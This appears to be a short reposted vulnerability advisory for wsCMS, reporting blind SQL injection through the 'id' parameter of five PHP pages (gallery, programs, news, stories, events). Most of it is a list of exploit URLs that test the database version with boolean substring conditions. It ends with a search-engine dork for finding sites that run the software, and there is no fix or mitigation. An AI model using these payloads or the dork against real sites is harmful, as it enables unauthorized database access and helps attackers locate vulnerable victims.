on
tutorial
- Get link
- Other Apps
- Get link
- Other Apps
[o] wsCMS Blind SQL Injection Vulnerability
Software : wsCMS
Vendor : http://www.websolutions.ca/
Author : NoGe
[o] Vulnerable file
gallery.php
programs.php
news.php
stories.php
events.php
all file above affected by "id" parameter
[o] Exploit
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=5
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=5
[o] Dork
"Powered by wsCMS"
[o] Note
this a private script
Comments